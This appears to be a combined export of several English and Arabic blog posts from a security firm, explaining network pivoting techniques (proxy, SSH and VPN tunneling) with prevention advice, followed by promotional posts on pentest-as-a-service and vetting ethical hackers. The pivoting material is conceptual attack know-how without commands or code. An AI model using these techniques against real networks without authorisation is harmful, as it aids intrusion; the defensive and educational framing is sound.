<h2>What is Pivoting?</h2>

Pivoting is a technique used by attackers to move deeper within a network after initial access. It is typically executed during the Post-Exploitation phase and involves using a compromised device as a launching pad to access other parts of the network that are not directly accessible from the attacker&#39;s original position. Pivoting is often employed to bypass network segmentation or internal firewalls.

Pivoting is crucial in advanced cyber attacks, such as those carried out by Advanced Persistent Threats (APT). Understanding how pivoting works allows Security Operations Centers (SOC) and threat hunters to better secure their networks and anticipate potential attack paths. By applying strong security practices, organizations can make it significantly harder for attackers to successfully pivot within their networks. 
&nbsp;

<h2>How is Pivoting Applied?</h2>

1. Initial Compromise: The attacker exploits a vulnerability in a device within the target network. This can be done through various means, such as phishing, exploiting security vulnerabilities, or using stolen credentials.

2. Establishing a Foothold: After gaining access, the attacker implants malware, such as a backdoor or rootkit, to maintain control over the compromised device.

3. Information Gathering: The attacker performs reconnaissance to explore the network and gather as much information as possible, such as network topology and potential targets. This helps identify valuable systems or data to target next.

4. Pivoting: The attacker uses the compromised device to explore and access other systems within the network. Some techniques that might be used include:

4.1 Proxy Pivoting: The attacker uses the compromised device as a proxy server to hide their true origin, making it appear as though the attacks are coming from within the network. 
&nbsp;

<h2>Example Scenario:</h2>

<ol>
	<li>The attacker wants to communicate with a server but is blocked by a firewall.</li>
	<li>There is a victim&#39;s device that can access the server.</li>
	<li>The attacker compromises the victim&#39;s device and opens a listening session through a proxy using the HTTP protocol on any port. The victim&#39;s device then acts as a bridge between the attacker and the server, as well as the rest of the internal network.</li>
</ol>

<img alt="" src="/media/blog/2024/08/26/im1.png" style="height:902px; width:2000px" />

The advantage of this method is that it is fast, but it will be unencrypted due to HTTP, and the server will be able to detect the attacker&#39;s presence if sniffing is performed.

<h2>4.2 Tunneling Pivoting</h2>

Tunneling Pivoting involves using a compromised device to route traffic through encrypted channels, such as SSH or VPN, to access other systems or networks. This method includes two approaches:

<h2>4.2.1 SSH Pivoting:</h2>

<ul>
	<li>This is very similar to Proxy Pivoting but differs in the port used. Here, the attacker uses the SSH protocol on port 22, which is shared between the attacker and the victim.</li>
	<li>The attacker will establish a listening session through the proxy using the SSH protocol.</li>
</ul>

Advantage: The server cannot detect it as quickly, but it may notice unusual SSH traffic between the attacker and the victim.

<h2>4.2.2 VPN Pivoting:</h2>

<ul>
	<li>This involves using a compromised device as a gateway to access and explore other devices or network segments that are not directly reachable from the attacker&#39;s initial position. The compromised device becomes a &quot;pivot point&quot; enabling the attacker to route traffic through it, making it appear as if it originates from within the internal network.</li>
</ul>

<h2>Scenario:</h2>

<ul>
	<li>Unlike the previous methods, the attacker cannot reach the server by exploiting the victim through protocols like HTTP or SSH because the firewall blocks their access.</li>
	<li>The attacker exploits a vulnerability on the server and establishes a Remote Port Forwarding Tunnel, allowing access to a sensitive subnet that the attacker cannot directly reach from the outside.</li>
</ul>

<img alt="" src="/media/blog/2024/08/26/im2.png" style="height:1006px; width:2000px" />

This method is very useful for privilege escalation and completing transitions between systems and networks, damaging additional devices, and searching for what the attacker is after, such as valuable data or critical infrastructure. This step is called lateral movement, which is the fifth step after pivoting.

<h2>To prevent this technique:</h2>

<ol>
	<li>Network Segmentation: Dividing different parts of the network into smaller networks can limit the attacker&#39;s ability to pivot. Even if the attacker breaches and gains access to one network, they may not be able to reach the others.</li>
	<li>Least Privilege Access: Limiting user and system permissions ensures that even if a system is compromised, the attacker&#39;s ability to move laterally is restricted.</li>
	<li>Monitoring and Logging: Detailed log monitoring and network traffic observation are useful in detecting unusual and suspicious activity that may indicate pivoting.</li>
	<li>Closing Unused Ports: This proactive action significantly reduces the exploitation of open, unused ports on hosts, preventing potential exploitation.</li>
</ol>

<h2>ما هو التمحور (Pivoting ) ؟</h2>

التقنية التي يستخدمها المهاجم للتحرك بشكل أعمق داخل الشبكة بعد الوصول الأولي. يتم تنفيذه في مرحلة&nbsp; (Post Exploitation)، ويتضمن عادةً استخدام جهاز مخترق كمنصة انطلاق للوصول إلى أجزاء أخرى من الشبكة لا يمكن الوصول إليها مباشرة من موقع المهاجم.غالبًا ما يتم استخدام التمحور في محاولة للتحايل على تجزئة أمان الشبكة أو جدران الحماية الداخلية

يعد التمحور تقنية بالغة الأهمية في الهجمات السيبرانية المتقدمة، مثل تلك التي تنفذها التهديدات المستمرة المتقدمة (advanced persistent threat - APT) ، إن فهم كيفية عمل التمحور يسمح لفريق أمن العمليات (SOC) و اصطياد الثغرات بتأمين شبكاتهم بشكل أفضل وتوقع مسارات الهجوم المحتملة. من خلال تطبيق ممارسات أمنية قوية، يمكن للمؤسسات أن تجعل من الصعب جدًا على المهاجمين التمركز بنجاح داخل شبكتهم.

&nbsp;

<h2>كيف يتم تطبيق التمحور (Pivoting ) ؟</h2>

1.وصول أولي ((Initial Compromise : بعد أن يقوم المهاجم باستغلال نقطة ضعف لدى أي جهاز بالشبكة المستهدفة، ويمكن القيام بذلك من خلال وسائل مختلفة، مثل التصيد الاحتيالي، أو استغلال الثغرات الأمنية، أو استخدام بيانات الاعتماد المسروقة**.**

2. إنشاء موطئ أثر(Foothold) : بعد الوصول يتم زرع برمجيات خبيثة، (Backdoor) أو (Rootkit)، للحفاظ على السيطرة على الجهاز المخترق.

3.جمع المعلومات(Information Gathering): سيقوم المهاجم باستطلاع واستكشاف الشبكة و تجميع أكبر قدر من المعلومات مثل هيكل الشبكة ( Network topology) و والأهداف المحتملة. ويساعد هذا الاستطلاع في تحديد الأنظمة أو البيانات القيمة لاستهدافها بعد ذلك.

4.التمحور (Pivoting): يستخدم المهاجم الجهاز المخترق لاستكشاف الأنظمة الأخرى داخل الشبكة والوصول إليها. ومن الأساليب التي قد يستخدمها المهاجم:

&nbsp;

<h2>Proxy Pivoting</h2>

استخدام الجهاز المخترق كخادم وكيل (Proxy) لإخفاء الأصل الحقيقي للمهاجم، مما يجعله يبدو كما لو كانت الهجمات قادمة من داخل الشبكة.

(سيناريو)

<ol>
	<li>يريد المهاجم التواصل مع السيرفر ولكن المهاجم محظور بواسطة الفايروول </li>
	<li>ويوجد هناك جهاز الضحية الذي يمكنه الوصول إلى السيرفر</li>
	<li>سيقوم المهاجم باختراق جهاز الضحية وفتح جلسة استماع عن طريق (Proxy) باستخدام برتوكول (HTTP) على أي منفذ (Port) وسيكون الضحية هو الوسيط بين المهاجم والسيرفر وبقية أجهزة الشبكة الداخلية</li>
</ol>

<img alt="" src="/media/blog/2024/08/26/im1_m7batZP.png" />

ميزة هذا الأسلوب&nbsp; أنه سريع ولكن سيكون غير مشفرة بسبب (HTTP) وسيتطيع السيرفر اكتشاف وجود المهاجم اذا عمل (Sniffing)

<h2>Tunneling Pivoting</h2>

استخدام الجهاز المخترق لتوجيه حركة المرور عبر القنوات المشفرة مثل (SSH-VPN) للوصول للأنظمة أو الشبكات الأخرى. وهذا النوع يشمل أسلوبين :

<h2>SSH Pivoting</h2>

1.شبيه جدأ بأسلوب (Proxy) ولكن يختلف بالمنفذ المستخدم حيث هنا سيستخدم المهاجم برتوكول(SSH)&nbsp; على منفذ 22 وهذا المنفذ مشترك بين المهاجم والضحية

2.سيقوم المهاجم بفتح جلسة استماع عن طريق البروكسي باستخدام برتوكول SSH

ميزة هذا الأسلوب لا يستطيع السيرفر اكتشافه بشكل أسرع ولكن سيلاحظ وجود عملية غريبة لبرتوكول SSH&nbsp; بين المهاجم والضحية

<h2>VPN Pivoting</h2>

وهو يتضمن استخدام جهاز مخترق كبوابة للوصول إلى الأجهزة الأخرى أو أجزاء الشبكة واستكشافها والتي لا يمكن الوصول إليها مباشرة من الموقع الأولي للمهاجم. يصبح الجهاز المخترق نقطة &quot;محورية&quot;، مما يمكّن المهاجم من توجيه حركة المرور من خلاله والظهور كما لو كان قادمًا من داخل الشبكة الداخلية.

السيناريو

1.بخلاف الأساليب السابقة، لا يستطيع المهاجم الوصول إلى السيرفر عن طريق استغلال الضحية في أي برتوكول مثل

HTTP, SSH&nbsp; ، لأنه الفايروول يحظر وصولهم

<ol start="2">
	<li>سيقوم المهاجم باستغلال أي ضعف موجود عند السيرفر وفتح Remote Port Forward Tunneling ، وسيسمح بإمكانية الوصول إلى شبكة فرعية حساسة لا يمكن للمهاجم الوصول إليها مباشرة من الخارج.</li>
</ol>

&nbsp;

<img alt="" src="/media/blog/2024/08/26/im2_DviZGT9.png" />

وهذا الأسلوب مفيد جدأ في تصعيد الصلاحيات وإكمال عمليات الإنتقال بين الأنظمة والشبكات والإضرار بأجهزة إضافية، للبحث عما يريد عنه المهاجم.مثل البيانات القيّمة أو البنية التحتية الحيوية وتسمى الخطوة هذه بالتحرك جانبياً- أفقياً (Lateral Movement) وهي الخطوة الخامسة بعد التمحور.

 
&nbsp;

<h2 dir="rtl" style="text-align:right">لمنع هذا التكنيك&nbsp;</h2>

1.تقسيم الشبكة : من الممكن أن يؤدي تقسيم أجزاء مختلفة من الشبكة لشبكات أصغر إلى الحد من قدرة المهاجم على التحرك بشكل محوري. وحتى لو قام بالإختراق والوصول إلى شبكة واحدة، فقد لا يتمكن من الوصول إلى الشبكات الأخرى.

2.أقل امتيازات الوصول(Least Privilege Access): يضمن الحد من أذونات المستخدم والنظام أنه حتى في حالة تعرض النظام للاختراق، فإن قدرة المهاجم على التحرك أفقيًا (Lateral Movement) تكون مقيدة.

3. المراقبة (Monitoring and Logging): من المفيد مراقبة السجلات التفصيلية ومراقبة حركة مرور الشبكة في اكتشاف النشاط غير المعتاد والغريب الذي قد يشير إلى التمحور.

4. إغلاق المنافذ غير المعروفة: هذا الفعل الإستباقي يقلل بنسة كبيرة من استغلال المنافذ المفتوحة غير المستخدمة في أجهزة المضيفين من أي فعل استغلالي.&nbsp;

&nbsp;

Pivoting-Technique

Pivoting is a technique used by attackers to move deeper within a network after initial access. It is typically executed during the Post-Exploitation phase and involves using a compromised device as a launching pad to access other parts of the network that are not directly accessible from the attacker's original position. Pivoting is often employed to bypass network segmentation or internal firewalls.

التقنية التي يستخدمها المهاجم للتحرك بشكل أعمق داخل الشبكة بعد الوصول الأولي. يتم تنفيذه في مرحلة  (Post Exploitation)، ويتضمن عادةً استخدام جهاز مخترق كمنصة انطلاق للوصول إلى أجزاء أخرى من الشبكة لا يمكن الوصول إليها مباشرة من موقع المهاجم.غالبًا ما يتم استخدام التمحور في محاولة للتحايل على تجزئة أمان الشبكة أو جدران الحماية الداخلية

Pivoting Technique

تكنيك ال Pivoting

36.00

Pentesting, or penetration testing, has been a staple in security for decades, but it hasn&#39;t evolved as rapidly as other security practices. Many organizations use pentesting merely to satisfy compliance requirements rather than as a genuine security measure to protect their brand and customers.

Traditional pentesting engagements are often sluggish, consume significant resources, and fail to produce meaningful results. This blog explores common pitfalls in current pentesting practices and demonstrates how harnessing the power of the pentester community and the efficiency of a Pentest as a Service (PTaaS) platform can add substantial value to your organization.

&nbsp;

<h2>Issue 1: Inexperienced Pentesters</h2>

Customers frequently report that traditional pentesting vendors provide teams largely composed of junior pentesters, supervised by a senior pentester. This arrangement forces the senior pentester to split their focus between testing, mentoring, and reporting, leading to suboptimal results.

At Trustline, our pentesters are an elite group meticulously vetted by our Community team, which assesses their past professional experience, performance in other Trustline programs, challenges, and credentials . With 50% of our pentesters boasting over three years of experience, our customers consistently receive expert, credentialed testers.

&nbsp;

<h2>Issue 2: Checklist-Driven Pentesting</h2>

While methodology is crucial in pentesting, traditional firms often prioritize ticking boxes over genuinely finding vulnerabilities. Our Pentest Community members, who also engage in Bug Bounty Programs, approach testing like real-world adversaries, identifying elusive vulnerabilities before they can be exploited. We further encourage creativity by allowing unstructured testing time alongside structured methodology.

&nbsp;

<h2>Issue 3: Limited Talent Pool</h2>

Organizations often rotate pentest vendors to gain fresh insights, as traditional firms typically lack a diverse talent pool. This rotation necessitates time-consuming onboarding, detracting from product security improvement.

Trustline&rsquo;s community model offers access to. hundreds of pentesters, enabling rotation without onboarding new vendors. Our extensive and diverse talent pool, experienced across various asset types and vulnerability classes, ensures that we can quickly source the right expertise. Consequently, 30% of our pentest findings are high or critical severity, double the industry average.

<img alt="" src="/media/blog/2024/06/04/pool-of-penetration-testers.png" style="height:872px; width:1920px" />

<h2>Issue 4: Slow Results Delivery</h2>

Organizations are frequently frustrated by the lengthy timelines associated with traditional pentests, which typically take weeks to deliver results post-testing.

With Trustline&rsquo;s PTaaS platform, customers receive vulnerability findings in real time, often addressing and retesting issues before the pentest concludes.

&nbsp;

<h2>Issue 5: Lack of Real-Time Visibility</h2>

Traditional pentesting often suffers from a lack of transparency and real-time updates, leaving organizations in the dark about progress.

Our PTaaS platform provides our Clients with real-time visibility into the pentest process, allowing them to monitor progress and communicate with pentesters throughout the engagement. This centralized platform streamlines scoping, testing, reporting, and remediation.

<img alt="" src="/media/blog/2024/06/04/engagement-assessment-overview.png" style="height:3753px; width:4320px" />

&nbsp;

<h2>Issue 6: Poor Communication with Pentesters</h2>

Conventional pentests are typically a black box, with minimal communication until a final report is delivered weeks after testing concludes.

Trustline&rsquo;s pentests offer direct communication via. Slack with both pentesters and Technical Engagement Managers. Regular status updates and open communication channels ensure efficient and effective testing.

&nbsp;

<h2>Issue 7: Integration Challenges with Remediation</h2>

Effective pentesting requires swift remediation of identified vulnerabilities, which is often hampered by poor integration with existing tools and processes.

Our platform supports . integration with most popular ticketing systems and SDLC tools, plus APIs for additional custom integrations. This eliminates the need for manual data transfer from reports, streamlining the remediation process.

&nbsp;

<h2>Enhancing Security with PTaaS and the Pentest Community</h2>

Combining the expertise of our pentester community with the efficiencies of our PTaaS platform minimizes threat exposure across your attack surface. Our interactive and transparent approach not only enhances security but also empowers and educates your security teams.

If you would like to keep up on the latest news, follow us on social media <a href="http://twitter.com/TrustlineSec">Twitter</a>, <a href="http://www.linkedin.com/company/trustlinesec/">LinkedIn</a>&nbsp;and <a href="https://www.trustline.sa/contact-us">contact us</a> today to launch your first pentest program.

لطالما كان اختبار الاختراق عنصرًا أساسيًا في مجال الأمن السيبراني، لكنه لم يواكب التطورات المتسارعة في ممارسات الأمان الأخرى. تلجأ العديد من المنظمات والجهات إلى اختبارات الاختراق فقط امتثالًا للتشريعات السيبرانية، لا كإجراءات وقائية حقيقية لحماية بياناتها وعملائها.

لطالما عانت اختبارات الاختراق التقليدية من بطء التنفيذ، واستهلاك الموارد، وفشلها في تقديم نتائج ذات قيمة حقيقية. في هذه المدونة، سنُسلّط الضوء على الأخطاء الشائعة في الممارسات الحالية لاختبار الاختراق، ونُقدّم حلولًا مبتكرة تُمكّن المنظمات من تعزيز أمنها بشكل فعّال من خلال الاستفادة من مجتمع مختبرو الاختراق وكفاءة خدمات اختبار الاختراق كخدمة (PTaaS) مع ترست لاين.

&nbsp;

<h2>المشكلة الأولى: فِرَق اختبار تفتقر إلى الخبرة العميقة</h2>

يشتكي العملاء في كثير من الأحيان من نقص خبرة مختبري اختبار الاختراق لدى شركات اختبار الاختراق التقليدية. حيث تُقدّم هذه الشركات مختبرين اختراق مبتدئين، يشرف عليهم مختبر أختراق ذو خبرة. في هذه الحالة، يضطر مختبر الأختراق ذو الخبرة إلى تقسيم تركيزه بين اختبار الاختراق والتوجيه والإبلاغ، ممّا يُؤدّي إلى نتائج غير مرضية.

في ترست لاين، نُقدّم لعملائنا خبراء اختبار اختراق ذوي خبرة واسعة. يتمّ انتقاؤهم بعناية من قبل فريقنا، الذي يقوم بتقييم خبرتهم المهنية السابقة، وأدائهم في برامج ترست لاين الأخرى، والتحديات، والأوراق الثبوتية. يتميز 50٪ من خبراء اختبار الاختراق لدينا بأكثر من ثلاث سنوات من الخبرة

&nbsp;

<h2>المشكلة الثانية: التركيز على إكمال المهام بدلاً من البحث عن الثغرات</h2>

يُشكل الاعتماد على قوائم المهام في اختبار الاختراق التقليدي عائقًا كبيرًا حيث تُركز قوائم المهام على إكمال مهام محددة مُسبقًا، مما يؤدي الى تجاهل الكثير من الثغرات المحتملة التي قد لا تكون مُدرجة في القائمة. قد تُصبح المنظمة عُرضة لهجمات إلكترونية بسبب الثغرات التي لم يتم الكشف عنها لعدم تضمينها في قائمة المهام للاختبار.

كذلك تتغير طبيعة التهديدات الإلكترونية باستمرار، بينما تبقى قوائم المهام ثابتة، مما يُعيق الكشف عن الثغرات الديناميكية والحديثة. قد تُصبح المنظمة عُرضة لأنواع جديدة من الهجمات الإلكترونية لم يتم تضمينها في قوائم الاختبار التقليدية.

فلذلك قوائم المهام تجبر مُختبري الاختراق إلى تكرار اختبار نفس الثغرات المُكتشفة سابقًا، مما يُؤدي إلى إهدار الوقت وإطالة مدة الاختبار. يُؤدي تأخير اكتشاف الثغرات إلى تأخر عملية الاستجابة ومعالجة المخاطر، مما يُعرض المنظمة لمخاطر أمنية أكبر.

للتغلب على هذه القيود، نُقدم نهجًا استقصائيًا في اختبار الاختراق، يدمج خبرة مُختبرين اختراق مع افضل الممارسات، بحيث نتيح لهم حرية البحث عن الثغرات اضافية دون قيود، مما يساهم في الكشف عن جميع نقاط الضعف المحتملة بشكل فعال وسريع.

&nbsp;

<h2>المشكلة الثالثة: نطاق المواهب المحدودة في مجال اختبار الاختراق</h2>

تواجه المنظمات والجهات تحديات كبيرة في مجال اختبار الاختراق، حيث تُعاني من نقص في تنوع المواهب. في كثير من الأحيان، تضطر المنظمات والجهات على تغيير مقدمي خدمات اختبار الاختراق بحثًا عن اشخاص جديدة ومختلفة، وذلك بسبب افتقار الشركات التقليدية إلى تنوع الخبرات.

يُؤدي هذا التنقل بين مقدمي الخدمات بحثًا إلى إهدار الوقت والموارد، حيث يتطلب كل تغيير الى إعداد وتخطيط مُكثف، مما يُعيق عملية اختبار الاختراق.

يُقدم نموذج &quot;ترست لاين&quot; حلًا مبتكرًا لهذه المشكلة، حيث يُتيح الوصول إلى المئات من مختبري الاختراق ذوي الخبرات المتنوعة.

مجتمع ترست لاين مكون من مختبرين اختراق متميزين في شتى مجالات اختبار الاختراق، مما يضمن حصول المنظمات على الخبرة المناسبة بسرعة وكفاءة.

نتيجة لذلك، تُحقق اختبارات الاختراق كخدمة لدى ترست لاين نتائج استثنائية،

<img alt="" src="/media/blog/2024/06/05/pool-of-penetration-testers.png" style="height:872px; width:1920px" />

<h2>المشكلة الرابعة: بطء تسليم النتائج</h2>

بطء تسليم نتائج اختبارات الاختراق التقليدية هو مصد رئيسي للإحباط بالنسبة للمنظمات. غالبًا ما تستغرق هذه الاختبارات أسابيع للحصول على النتائج، مما يعرقل عملية الاستجابة للمخاطر ويُعرّض المنظمات لتهديدات أمنية مُستمرة.

منصة ترست لاين تقدم حلًا مبتكرًا لهذه المشكلة, يتلقى العملاء على منصة ترست لاين تقارير الثغرات بشكل مباشر

مما يساهم في سرعة الأستجابة و المعالجة للثغرات المكتشفة في اسرع وقت ممكن

مع منصة ترست لاين ، تُصبح اختبارات الاختراق مُجرد عملية سريعة وفعالة، مما يُساعد المنظمات على حماية بياناتها وأنظمتها بشكل أفضل.

&nbsp;

<h2>المشكلة الخامسة: انعدام الشفافيه وصعوبة الاطلاع على التفاصيل</h2>

نقص الشفافية والتحديثات الفورية خلال اختبارات الاختراق التقليدية هي من ضمن العيوب الرئيسية. تُعاني المنظمات والجهات من قلة المعلومات حول تقدم اختبار الأختراق، مما يُخلق حالة من الضبابية ويُعيق عملية التواصل .

تقدم منصة ترست لاين حلًا مبتكرًا لهذه المشكلة من خلال.توفير رؤية واضحة ومباشرة للعملاء في الوقت الفعلي في أثناء عملية اختبار الاختراق، مما يُتيح لهم متابعة مراحل اختبار الاختراق والتواصل مع مختبرين الاختراق بشكل مباشر وربط نتائج اختبار الاختراق بسهولة من خلال لوحة التحكم.

<img alt="" src="/media/blog/2024/06/05/engagement-assessment-overview.png" style="height:3753px; width:4320px" />

<h2>المشكلة السادسة: ضعف التواصل مع المختبرين</h2>

اختبارات الاختراق التقليدية تتبع عادة أسلوبًا يعتمد على الحد الأدنى من التواصل حتى يتم تسليم التقرير النهائي بعد أسابيع من انتهاء الاختبار.

تقدم ترست لاين اسسمنت التواصل المباشر عبر (سلاك) لنضمن قناة اتصال مفتوحة وفعالة مع كل من مختبرين الاختراق, والمدراء الفنيين.

&nbsp;

<h2>المشكلة السابعة: تحديات الأتمتة مع تصحيح الثغرات</h2>

غالبًا ما تُواجه المنظمات والجهات صعوبات في دمج اختبارات الاختراق التقليدية مع أدواتها وعملياتها المؤتمتة الحالية، مما يُعيق عملية التصحيح ويُؤخر معالجة المخاطر.

ترست لاين تقدم حلًا مبتكرًا لهذه المشكلة من خلال الربط مع (جيرا) لأتمتة وتسهيل عملية اصلاح الثغرات و تلغي الحاجة للنقل اليدوي للبيانات وتحسن من كفاءة العمليات ككل

&nbsp;

<h2>تعزيز أمان منشأتك مع اختبار الأختراق كخدمة مع مجتمعنا الأمني</h2>

في عالمنا الرقمي، اصبحت التهديدات الإلكترونية أكثر تعقيدًا وخطورة، مما تهدد من أمان منشأتك بشكل كبير. اختبار الاختراق تقنية أساسية لضمان سلامة أنظمتك وتطبيقاتك، لكن تنفيذه بالطرق التقليدية يتطلب استثمارات كبيرة من الوقت والجهد والموارد. يُقدم اختبار الاختراق كخدمة مع ترست لاين حلولاً مبتكرة تتيح لك الاستفادة من خبرة واسعة وكفاءة عالية بتكلفة فعالة

يمكنك متابعتنا على وسائل التواصل الاجتماعي مثل <a href="http://twitter.com/TrustlineSec">تويتر</a> و<a href="http://www.linkedin.com/company/trustlinesec/">لينكد إن</a>، ساهم في حماية منشأتك و&nbsp;<a href="mailto:info@trustline.sa">تواصل معنا</a> للاستفادة من برنامج اختبار الاختراق كخدمة

Rethinking Pentesting Why It Needs a Modern Makeover

إعادة التفكير في اختبار الاختراق لماذا يحتاج إلى تحديث وتحسين

Rethinking-Pentesting-Why-It-Needs-a-Modern-Makeover

Pentesting, or penetration testing, has been a staple in security for decades, but it hasn't evolved as rapidly as other security practices. Many organizations use pentesting merely to satisfy compliance requirements rather than as a genuine security measure to protect their brand and customers.

اختبار الاختراق كان متواجداً في مجال الأمن السيبراني لعقود، لكنه لم يتطور بنفس السرعة التي تطورت بها ممارسات الأمن السيبراني الأخرى. تستخدم العديد من المنظمات والجهات اختبار الاختراق فقط لتلبية متطلبات الامتثال بدلاً من كونها تدابير أمنية حقيقية لحماية علامتها التجارية وعملائها.

You're Doing Penetration Testing Wrong!

آلية تنفيذك لاختبار الاختراق خاطئة!

Imagine a world where online banking feels like a gamble, every click harbors a potential security breach, and sensitive data is constantly under siege. Unfortunately, this is the harsh reality without a robust cybersecurity strategy.

The digital revolution has brought immense convenience, but it&#39;s also opened doors for malicious actors. But wait, there are heroes in this digital landscape &ndash; ethical hackers! These skilled professionals work tirelessly to identify vulnerabilities before cybercriminals exploit them.

The nagging question remains: can you truly trust these ethical hackers with your organization&#39;s crown jewels?

This blog cuts through the confusion and explores the world of ethical hacking. We&#39;ll delve into the rigorous vetting processes, performance-based selection, and strict access controls that ensure ethical hackers are your trusted allies, not adversaries.

Discover how ethical hacking can be your secret weapon, transforming your organization from a vulnerable target to a proactive defender. Buckle up and get ready to unlock the power of trust in the digital age!

&nbsp;

<h2>How Can You Trust Ethical Hackers?</h2>

A notable 52% of security professionals prefer to deal with unknown vulnerabilities rather than engage with hackers. This sentiment is especially prevalent among organizations bound by strict compliance standards or operating in heavily regulated sectors, where ethical hacking might seem too risky despite its proven benefits in mitigating security threats through third-party vulnerability reports.

Common concerns from potential clients about collaborating with hackers include questions like, &quot;How can I trust hackers?&quot; and &quot;How do I maintain control of my environment?&quot; Trustline understands these concerns and has implemented rigorous filtering processes to ensure that the ethical hackers you work with are trustworthy and reliable.

&nbsp;

<h2>How Trustline Ensures Trust and Safety</h2>

Thorough Vetting Process: Trustline subjects all prospective hackers to an extensive vetting process. This includes identity verification, background checks, and evaluation of their past performance in similar roles. By ensuring that only verified and reliable individuals are allowed to participate, Trustline minimizes the risk associated with engaging with external hackers.

Performance-Based Selection: Trustline emphasizes selecting hackers based on their proven performance. This means that only those with a track record of high-quality, reliable work are chosen for projects. By focusing on performance metrics and past successes, Trustline ensures that you are working with the best in the field.

Compliance and Regulation Adherence: Trustline is committed to helping clients meet their compliance and regulatory requirements. Hackers are selected not only for their skills but also for their ability to operate within the legal and regulatory frameworks relevant to the client&rsquo;s industry. This includes ensuring that all hackers have the necessary clearances and certifications required for the engagement.

Controlled Access: Trustline maintains strict control over the access granted to hackers. This includes defining clear boundaries and scopes of work to ensure that hackers only have access to the information and systems necessary for their task. By managing and monitoring access levels, Trustline ensures that your environment remains secure.

Continuous Monitoring and Support: Trustline provides ongoing monitoring and support throughout the engagement with ethical hackers. This includes regular check-ins, performance reviews, and immediate intervention if any issues arise. By maintaining an active role in the engagement, Trustline ensures that your security remains intact and that the hackers remain focused on their objectives.

By implementing these rigorous filtering and monitoring processes, Trustline ensures that you can confidently work with ethical hackers. This approach not only helps maintain control over your environment but also significantly reduces security risks, providing peace of mind and robust protection for your organization.

&nbsp;

If you would like to keep up on the latest news, follow us on social media <a href="http://twitter.com/TrustlineSec" rel="noopener noreferrer" tabindex="0">Twitter</a>, <a href="http://www.linkedin.com/company/trustlinesec/" rel="noopener noreferrer" tabindex="0">LinkedIn</a>&nbsp;and To learn more About our Ethical Hacker Community, <a href="https://www.trustline.sa/contact-us" rel="noopener noreferrer" tabindex="0">contact us</a> today to benefit from our security community.

تخيل عالماً أصبحت فيه الخدمات المصرفية عبر الإنترنت محفوفة بالمخاطر، وكل نقرة على الفأرة قد تكون ثغرة أمنية، والبيانات الحساسة معرضة للسرقة باستمرار. للأسف، هذا هو الواقع الذي ينتظرك بدون استراتيجية أمن سيبراني قوية.

لقد أحدثت الثورة الرقمية سهولة كبيرة في حياتنا، لكنها في نفس الوقت فتحت الباب أمام المجرمين الإلكترونيين. ولكن هنالك الهاكرز الأخلاقيين! يعمل هؤلاء المحترفون المهرة بلا كلل على تحديد الثغرات الأمنية قبل أن يستغلها المجرمون.

لكن يبقى السؤال الأهم: هل يمكنك حقًا الوثوق بهؤلاء الهاكرز الأخلاقيين بمعلومات مؤسستك الحساسة؟

تقدم لك هذه المدونة إجابات واضحة حول اختبار الاختراق الأخلاقي. سنكشف لك عن عمليات التدقيق الصارمة التي يخضع لها جميع الهاكرز الأخلاقيين المحتملين، واختيارنا القائم على الأداء، وضوابط الوصول المشددة التي تضمن أن يكون الهاكرز الأخلاقيين الذين نتعامل معهم شركاء موثوقين، وليسوا مصدر تهديد.

إكتشف كيف يمكن أن يكون اختبار الاختراق الأخلاقي سلاحًا سريًا لمؤسستك، يحولها من هدف ضعيف إلى مدافع استباقي قادر على صد أي هجوم.

&nbsp;

<h2>كيف يمكنك الوثوق بالهاكرز الأخلاقيين؟</h2>

52% من أخصائيي الأمن السيبراني يفضلون التعامل مع الثغرات الأمنية غير المعروفة بدلاً من المخاطرة بالتعاون مع الهاكرز الأخلاقيين. هذه المخاوف مبررة خاصة بالنسبة للمؤسسات التي تلتزم بمعايير صارمة أو تعمل في قطاعات حساسة، حيث قد يبدو اختبار الاختراق الأخلاقي أو برامج مكافآت الثغرات محفوفة بالمخاطر على الرغم من نتائجها الرائعة في الكشف عن الثغرات الأمنية الخطيرة التي قد يستغلها الهاكرز الحقيقيون.

تفهم منصة ترست لاين تمامًا هذه التحديات وقد صممنا نهجًا يضمن لك التعاون بثقة مع مجتمعنا الأمني للهاكرز الأخلاقيين.

&nbsp;

<h2>لماذا منصة ترست لاين هي الشريك الأمثل لاختبار الاختراق الأخلاقي؟</h2>

عملية تصفية دقيقة: يخضع جميع الهاكرز الأخلاقيين المسجلين في منصة ترست لاين لعمليات فحص دقيقة وصارمة, تشمل التحقق من الهوية، والتحقق من الخلفية الأمنية، وتقييم شامل لسجلاتهم السابقة. نضمن لك اختيار نخبة من الهاكرز ذوي السمعة الطيبة والخبرة الواسعة للتعامل مع احتياجات مؤسستك بما يتعلق بالجانب الأمني.

&nbsp;

التركيز على الأداء: لا نكتفي فقط بالمهارات، بل نختار الهاكرز&nbsp; بناءً على إنجازاتهم الموثقة. نتعاون فقط مع الهاكرز الذين لديهم تاريخ حافل بالنجاح في الكشف عن ثغرات أمنية حقيقية وإعداد تقارير مفصلة عنها.

الالتزام بالامتثال: نساعدك على ضمان التزامك بالمعايير واللوائح التنظيمية والتشريعية الصارمة. نختار الهاكرز الأخلاقيين الذين لديهم فهم عميق للقطاع الذي نعمل فيه، والتصاريح اللازمة للوصول إلى أنظمة المعلومات الخاصة بك بشكل قانوني وآمن.

التحكم الكامل: تمنح ترست لاين صلاحيات محددة للهاكرز الأخلاقيين بناءً على نطاق مشروعك. نضع قيودًا واضحة على وصولهم لضمان سلامة بياناتك وأنظمتك.

المراقبة مستمرة: نوفر لك مراقبة ودعمًا مستمرين طوال فترة برامج مكافآت الثغرات و اختبار الاختراق الأخلاقي. يتيح لك ذلك الاطمئنان على سير العمل ومعالجة أي مخاوف على الفور.

بفضل نهجنا الشامل، يمكنك التعاون مع الهاكرز الأخلاقيين بثقة تامة. لا تساعدك ترست لاين فقط على اكتشاف الثغرات الأمنية الخطيرة وتعزيز دفاعاتك، بل نضمن لك أيضًا راحة البال والحفاظ على سمعتك.

يمكنك متابعتنا على وسائل التواصل الاجتماعي مثل <a href="http://twitter.com/TrustlineSec">تويتر</a> و<a href="http://www.linkedin.com/company/trustlinesec/">لينكد إن</a>، ساهم في حماية منشأتك و&nbsp;<a href="mailto:info@trustline.sa">تواصل معنا</a> للاستفادة من مجتمعنا الأمني

 

<h2>&nbsp;</h2>

كيف يمكنك الوثوق بالهاكرز الأخلاقيين؟

How-Can-You-Trust-Ethical-Hackers

Imagine a world where online banking feels like a gamble, every click harbors a potential security breach, and sensitive data is constantly under siege. Unfortunately, this is the harsh reality without a robust cybersecurity strategy.

